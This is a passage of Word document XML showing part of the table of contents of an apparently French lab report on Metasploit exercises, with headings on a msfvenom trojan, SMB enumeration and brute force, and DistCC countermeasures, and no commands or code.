            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22DB161B" w14:textId="1A99A024" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957017" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cheval De Troie / Trojan (msfvenom) :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957017 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49EBDFC0" w14:textId="63633441" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957018" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit 5 : Scanner (smb_enumusers) et bruteforce :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957018 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78F3AFB3" w14:textId="490FDB5F" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957019" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957019 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37A855E5" w14:textId="20E20B88" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957020" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>III.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conception d’un scénario libre d’utilisation avec metasploit et démonstration :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957020 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FF4135F" w14:textId="0CDAA634" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957021" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dans cet exercice, on vous demande de tester un nouvel exploit avec metasploit, c’est-à-dire de rajouter un nouvel exercice au TP étudié au paragraphe 2.b en respectant la mise en forme proposée par les auteurs. (3 points)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957021 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="619813E7" w14:textId="5FE0B201" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957022" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Quelles-sont les différentes contre-mesures à mettre en place pour éviter la réalisation de cet exploit ?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957022 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22407071" w14:textId="717CAD4B" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957023" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Désactiver DistCC s’il n’est pas inutile :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957023 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D266BA1" w14:textId="6C3E7716" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957024" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Restreindre l’accès réseau :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957024 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65FBCB63" w14:textId="3FDD4E8D" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957025" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Configurer Distcc :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957025 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07B6953F" w14:textId="14025D38" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957026" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vérifier les mise à jour de scéurté pour DistCC avec la commande :</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957026 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0288442B" w14:textId="2E498C9F" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957027" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957027 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40ABD487" w14:textId="6BAE9805" w:rsidR="00D22572" w:rsidRDefault="00D22572">
          <w:pPr>
            <w:pStyle w:val="TM1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc197957028" w:history="1">
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IV.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00073813">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Annexes &amp; Bibliographie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197957028 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BF2259B" w14:textId="1B050DA6" w:rsidR="0001578E" w:rsidRPr="00A63075" w:rsidRDefault="00230DCA" w:rsidP="00D6524A">
          <w:pPr>
            <w:sectPr w:rsidR="0001578E" w:rsidRPr="00A63075" w:rsidSect="00EE6939">
              <w:headerReference w:type="default" r:id="rId9"/>
              <w:footerReference w:type="default" r:id="rId10"/>
              <w:pgSz w:w="11906" w:h="16838"/>
              <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
              <w:pgNumType w:start="0"/>
              <w:cols w:space="708"/>
              <w:titlePg/>
              <w:docGrid w:linePitch="360"/>
            </w:sectPr>
          </w:pPr>
          <w:r w:rsidRPr="004459DB">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2AB24486" w14:textId="6CD29916" w:rsidR="00A144BF" w:rsidRDefault="003029A2" w:rsidP="00205BC0">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
      </w:pPr>
